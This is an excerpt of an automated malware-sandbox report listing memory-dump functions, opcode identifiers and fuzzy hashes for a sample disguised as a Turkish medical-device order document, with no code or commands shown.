                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6e8c7317210bd0a7b2c9af14f7d04742efbdf56c44da099dc80d2d0c6d85f928
                                                                                                    • Instruction ID: cbd9136b7c392473852c4eca2d090801efd2caf851dc1ba9dec6e551a16c46ca
                                                                                                    • Opcode Fuzzy Hash: 6e8c7317210bd0a7b2c9af14f7d04742efbdf56c44da099dc80d2d0c6d85f928
                                                                                                    • Instruction Fuzzy Hash: 151120753082A14FC7119738D8545ED3FE59F86660B5841EBD14ACB3A2CF248C0397A1
                                                                                                    Function 075C29D0 Relevance: .1, Instructions: 66COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d7d420a6033f35dfb601e4a9fa4b9bcfd9531641d6fd42d40bf37c59616ec6df
                                                                                                    • Instruction ID: 0db76cac76e7cc5403b7b3ad10d6e6aab141d91fccccb613be6279bb80053d2c
                                                                                                    • Opcode Fuzzy Hash: d7d420a6033f35dfb601e4a9fa4b9bcfd9531641d6fd42d40bf37c59616ec6df
                                                                                                    • Instruction Fuzzy Hash: BE117274300506CFDB24DBA8EA44BAABBF5FB86310F08402EE515C7681DF74D905CBA1
                                                                                                    Function 075CF348 Relevance: .1, Instructions: 65COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ffb086112e5f7b55474934bc93892705364f0892ab033a80213229a2843e1a83
                                                                                                    • Instruction ID: 99547829719b0fbd1d1bcfdbb4f3228329f25e743a27ed92dbdfe0a9ccbb6262
                                                                                                    • Opcode Fuzzy Hash: ffb086112e5f7b55474934bc93892705364f0892ab033a80213229a2843e1a83
                                                                                                    • Instruction Fuzzy Hash: 94212CB1A1421EDBCB00DFE8C5406EEB7B6FF8A700F105A29D105B7291DA746E45CBA1
                                                                                                    Function 07429718 Relevance: .1, Instructions: 65COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 938d58cd71365a34a733bae072304a29e6b9364837dcbd91badce464135f872a
                                                                                                    • Instruction ID: 17d6aa4d7255bca2320d48292e5bdc5830001c3bb8e24fde2f9af8d9a3e0e5be
                                                                                                    • Opcode Fuzzy Hash: 938d58cd71365a34a733bae072304a29e6b9364837dcbd91badce464135f872a
                                                                                                    • Instruction Fuzzy Hash: E511E7F2F40116FFCB116A55D9446EEBFB4EB81340FA08C66DC49B3284E6308A339B94
                                                                                                    Function 0742B1E0 Relevance: .1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 933f7bd1a4bbb261a4f2db9b937d91530f0d4f00df869fddaf5b9ab3f9aa428d
                                                                                                    • Instruction ID: d8f324c4a83fd95bd3d49a37d1eb9b0dd2339a1fb3e58bc02e450309ef7f2547
                                                                                                    • Opcode Fuzzy Hash: 933f7bd1a4bbb261a4f2db9b937d91530f0d4f00df869fddaf5b9ab3f9aa428d
                                                                                                    • Instruction Fuzzy Hash: B71190F190035A8FCB11DEA988506EFB7F9FB89240F90052AC509E7200EB349912D772
                                                                                                    Function 00CAD38B Relevance: .1, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2241769406.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_cad000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
                                                                                                    • Instruction ID: e15bb6342f65d6cf6e8d7ff8c891b7562cfcf6112b58a94a546744bba9c12b97
                                                                                                    • Opcode Fuzzy Hash: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
                                                                                                    • Instruction Fuzzy Hash: 7F21A2B6504240DFCB05CF10D9C4B16BF71FB88314F24C5A9DD060B656C33AE956CB92
                                                                                                    Function 075C59F4 Relevance: .1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1a7f60c45a6f3239f3d1d140822a34168b58036e1f6d3943d4c5b96b0e2d0155
                                                                                                    • Instruction ID: 7f2bab6bff8e3bd8703933d3b725afa0699f718567db0f8dac3469a93e1b46fa
                                                                                                    • Opcode Fuzzy Hash: 1a7f60c45a6f3239f3d1d140822a34168b58036e1f6d3943d4c5b96b0e2d0155
                                                                                                    • Instruction Fuzzy Hash: 6421CFB590034D9FCB10DF9AD884ADEBFF4FB48720F10842AE919A7210C775A954CFA1
                                                                                                    Function 075CED90 Relevance: .1, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 119b6675724efcff37f1324fa060272d7a0b2ef7b200d4254b2dacc342d28d22
                                                                                                    • Instruction ID: 5c5f6d225d92a1ea04ec9606a564caa1d7239012bba382635396554929453f49
                                                                                                    • Opcode Fuzzy Hash: 119b6675724efcff37f1324fa060272d7a0b2ef7b200d4254b2dacc342d28d22
                                                                                                    • Instruction Fuzzy Hash: A811B4B0D046588BDB08DFEAC8456DEFBB6BF89300F04802AC419AB254DB7419468B50
                                                                                                    Function 0742ADF1 Relevance: .1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e5c9ffed61b238fedb69efb4b944c1047cc7d58c7f4e5a6b21c31a8bb79b4750
                                                                                                    • Instruction ID: 716e6988b02cb3c8f3d53bd64ce46ae403d741c8d7352d2cabea6f6af23fbfcb
                                                                                                    • Opcode Fuzzy Hash: e5c9ffed61b238fedb69efb4b944c1047cc7d58c7f4e5a6b21c31a8bb79b4750
                                                                                                    • Instruction Fuzzy Hash: C70128F1F4D2A1BFC7036764D8141E67FF0DB83240B5988E7DC85E7292E12549279B91
                                                                                                    Function 0742C432 Relevance: .1, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f606f35ff9b70f6fb9effcb6540cae47dc12e7ac6db5243d9f0958bfe585b974
                                                                                                    • Instruction ID: b61841d02e1bab13db9b6355ba49594e6258955fc58dab738e9594be88f6469d
                                                                                                    • Opcode Fuzzy Hash: f606f35ff9b70f6fb9effcb6540cae47dc12e7ac6db5243d9f0958bfe585b974
                                                                                                    • Instruction Fuzzy Hash: AB015E723181609FD715DB7AD8908AEBBFAEF8A61032540ABE541CB371CA71DC01CB61
                                                                                                    Function 00CBD1AF Relevance: .1, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2241824311.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_cbd000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                    • Instruction ID: 9a1bba42c355994a51136fd7dda7d2d1d703a5e8e3eee7af0f1d42c2d5975f85
                                                                                                    • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                    • Instruction Fuzzy Hash: 96119D75504284DFCB05CF50D5C4B55BFA1FB84318F24C6A9D84A4B656C33AD94ACBA2
                                                                                                    Function 00CBD367 Relevance: .1, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2241824311.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_cbd000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                    • Instruction ID: 2ed24af155c30db0964e133118eb310cc99af233a70d5be157bc79a3a30b7889
                                                                                                    • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                    • Instruction Fuzzy Hash: B5118B76504284DFCB05CF14D5C4B55BFA1FB84318F24C6A9D84A4B656C33AE94ACF62
                                                                                                    Function 0742F010 Relevance: .1, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ebe63407366d279fcc6d7ef7cb89b733beb550af4bf67f54da4763b79aebb640
                                                                                                    • Instruction ID: c9014ed237990bed012f8cee564a0c4da267362a8896970b26559501d669bd3a
                                                                                                    • Opcode Fuzzy Hash: ebe63407366d279fcc6d7ef7cb89b733beb550af4bf67f54da4763b79aebb640
                                                                                                    • Instruction Fuzzy Hash: 4811ACB0E0021ACFDB00DFA8C8117FEBBB1EF49214F50812AC911BB380DB75891ADB81
                                                                                                    Function 07429708 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7712c39a79e1d5c2f6c4547639bb310f10ef28c841001e04528887c424188314
                                                                                                    • Instruction ID: b626c7ae4b0d78a291c406f3bbac85edb0e78f75803c507864a21a4cc1cc408a
                                                                                                    • Opcode Fuzzy Hash: 7712c39a79e1d5c2f6c4547639bb310f10ef28c841001e04528887c424188314
                                                                                                    • Instruction Fuzzy Hash: 750128713141249F8714EF6EC8948AEBBEAEF8A61476544AAF501CB361CA71EC01DBA1
                                                                                                    Function 0742E1E8 Relevance: .0, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 549a3033cfa5cfcd3dba88f61970db111b2b29f794c3a907f56820a49b3ee82a
                                                                                                    • Instruction ID: 8ea2345a50f3ea814dbb17906abca3dbe17da1630d71003f19c14a9880759ffd
                                                                                                    • Opcode Fuzzy Hash: 549a3033cfa5cfcd3dba88f61970db111b2b29f794c3a907f56820a49b3ee82a
                                                                                                    • Instruction Fuzzy Hash: E80122329042199FCB01AA68DC404DABB75FFC9304B11866AE0416B251EB709599CB90
                                                                                                    Function 075C82D0 Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0897cedb4182bede591b63d5fcf92be7c1b2ae15c4ef44cfefe77a9e7c92f5b5
                                                                                                    • Instruction ID: 60418ae74e3d68d119bb12fac5437a9ce583fd65b57d5fdaa0a91e25d37651db
                                                                                                    • Opcode Fuzzy Hash: 0897cedb4182bede591b63d5fcf92be7c1b2ae15c4ef44cfefe77a9e7c92f5b5
                                                                                                    • Instruction Fuzzy Hash: 2101B1B4619295CFD315C7A8E8183E1BBA5BB07344F5496EFD009CB142C776E883C3AA
                                                                                                    Function 075C4DD0 Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b48f5b28a544dbf171a64302062126156d6e1209c151fe669c61e47a5c5c9990
                                                                                                    • Instruction ID: d1306ded4e9556bfaecb0a031860ddfccfdc2184ef02b837cd4213c34b8e6b22
                                                                                                    • Opcode Fuzzy Hash: b48f5b28a544dbf171a64302062126156d6e1209c151fe669c61e47a5c5c9990
                                                                                                    • Instruction Fuzzy Hash: FE013632604255AFDB065F55EC448AE7FB5FB882207148137F956C3361DB354D12DB91
                                                                                                    Function 075C2800 Relevance: .0, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d1b4f05bd459cc71f8b1c523f519a5c253fff1f939b49173d6ce92988310b95a
                                                                                                    • Instruction ID: bc58e0a932001c04e8d1e8d46def54308efb60fd075469185a6a10f8c16154c7
                                                                                                    • Opcode Fuzzy Hash: d1b4f05bd459cc71f8b1c523f519a5c253fff1f939b49173d6ce92988310b95a
                                                                                                    • Instruction Fuzzy Hash: 6AF0C2323042009FD3259B64F408A96BFA5FBC5321F15C07BE149CB641CA35C806CBA0
                                                                                                    Function 0742F020 Relevance: .0, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b7a5025fd9880245e5a7950c97f5d74fe6d4a9737169360848292dce9e2b61e0
                                                                                                    • Instruction ID: af5f4f6d8f6bb5ae4a19afd8824c75e895e9a933822099907f3c6d6bdaa80295
                                                                                                    • Opcode Fuzzy Hash: b7a5025fd9880245e5a7950c97f5d74fe6d4a9737169360848292dce9e2b61e0
                                                                                                    • Instruction Fuzzy Hash: 2F0140B0E0022ACFDB04EF68C8117BEB7B1EF49314F50852AC915B7390DB749516DB91
                                                                                                    Function 075C82C1 Relevance: .0, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cca38222527a85b1c790fa26840e4a782c988c72b563536688e3008f4012e2d2
                                                                                                    • Instruction ID: 19f8f6447e9e34ddfa94ba99fcf9970d0de45f69938fd61f877ea6aaaac148cb
                                                                                                    • Opcode Fuzzy Hash: cca38222527a85b1c790fa26840e4a782c988c72b563536688e3008f4012e2d2
                                                                                                    • Instruction Fuzzy Hash: E9016DF46196159FC321C698ED083F0B7A5F702691F4496AFE40ACB541C736A881C7AA
                                                                                                    Function 075C7D58 Relevance: .0, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 58b074ca5615139b9c4ecc1de7a9f51a30d5d97ffed339315f12addb1b5df4e0
                                                                                                    • Instruction ID: fd8a0fecaa2a4fcc1e85afe3d0e4bb33309d670f3abcb49febb722f85a45bb2f
                                                                                                    • Opcode Fuzzy Hash: 58b074ca5615139b9c4ecc1de7a9f51a30d5d97ffed339315f12addb1b5df4e0
                                                                                                    • Instruction Fuzzy Hash: AF01D67055C3D48FD342D6A8D4103B97FA2AB47319F0884AED0455F98AC77A9487CB21
                                                                                                    Function 075C8F1C Relevance: .0, Instructions: 40COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7a47697956c3077bc96e4365f616bf96b037e2d663ff383f54e1ef5dbb95afb9
                                                                                                    • Instruction ID: 583b28f56f692d28bde6f2e22eb8fdfa6110554335cf5a7e3fe09c12b9686ae0
                                                                                                    • Opcode Fuzzy Hash: 7a47697956c3077bc96e4365f616bf96b037e2d663ff383f54e1ef5dbb95afb9
                                                                                                    • Instruction Fuzzy Hash: 88F02BE255D294DFC301C2D85C212F13FA9F967111B410DCFE447CB952D6297401C397
                                                                                                    Function 07429328 Relevance: .0, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8eb12f53cc30e818af86f2e38b0e28a40c786c0494f79efdd6b3010258ceba53
                                                                                                    • Instruction ID: a97c1c80f9859f5fe9822c8266eb7881a3bbc9c880338ded92a03b7e2ad579d0
                                                                                                    • Opcode Fuzzy Hash: 8eb12f53cc30e818af86f2e38b0e28a40c786c0494f79efdd6b3010258ceba53
                                                                                                    • Instruction Fuzzy Hash: EF01F431A002148FCB12EB69D8888DEFFF4FF8631071081AFE1049B361EB305906CBA2
                                                                                                    Function 0742E1F8 Relevance: .0, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7c787365c7b9a41c82597222f80dd5bfe697a21723d1c3adeb645cac7ec6d72c
                                                                                                    • Instruction ID: 663146f8fec99e878b9f0c7e87e9f034b8a1181521b9e10eaa5b4b38d92c717a
                                                                                                    • Opcode Fuzzy Hash: 7c787365c7b9a41c82597222f80dd5bfe697a21723d1c3adeb645cac7ec6d72c
                                                                                                    • Instruction Fuzzy Hash: 1401D632E1061A9BCF00EEA5CC444DEFB76FFD5304F41862AE04527210EB70A595CB90
                                                                                                    Function 0742EF80 Relevance: .0, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: af37a58ed249470e122e2c872a80d59ca352060c1d4d1ec2aa5d44464d53d21b
                                                                                                    • Instruction ID: 757d6ba9da76da9c4bbd0189ac6ebd92892d9a591c69dba0caf56f10ca6bb17e
                                                                                                    • Opcode Fuzzy Hash: af37a58ed249470e122e2c872a80d59ca352060c1d4d1ec2aa5d44464d53d21b
                                                                                                    • Instruction Fuzzy Hash: C6F0B4753145648FC705CB2ED854DD97BE89F8AA5031640EBE006CF372CA60DC02CB50
                                                                                                    Function 075CA2D0 Relevance: .0, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a70e2fdc2f6b503bd732694c586a5c8b415d6649ce1329fdb7084b06c58ad399
                                                                                                    • Instruction ID: 84d03ad5726016130cf2f8a3f27049e4a1a77a400de61693c2bf33bb1ee1dd94
                                                                                                    • Opcode Fuzzy Hash: a70e2fdc2f6b503bd732694c586a5c8b415d6649ce1329fdb7084b06c58ad399
                                                                                                    • Instruction Fuzzy Hash: 19F0B472204148AFDF15DBA4EC519EE7FB5EF45120B14C1EBE004DB262E6719980C791
                                                                                                    Function 075C4DE0 Relevance: .0, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5124ffe15d58c5d982cd0b6716bb31c2e11536f4acd8c2ae56537b008e18af44
                                                                                                    • Instruction ID: 8c0883b7fefe36be1f47bb9b8990a6babdb2df8a17275c2e622049192246d6d6
                                                                                                    • Opcode Fuzzy Hash: 5124ffe15d58c5d982cd0b6716bb31c2e11536f4acd8c2ae56537b008e18af44
                                                                                                    • Instruction Fuzzy Hash: 5FF01235700219AFDB055F55E84986EBFA6FB8C620710813AFD19C3350DB758C219B90
                                                                                                    Function 0742E2CE Relevance: .0, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
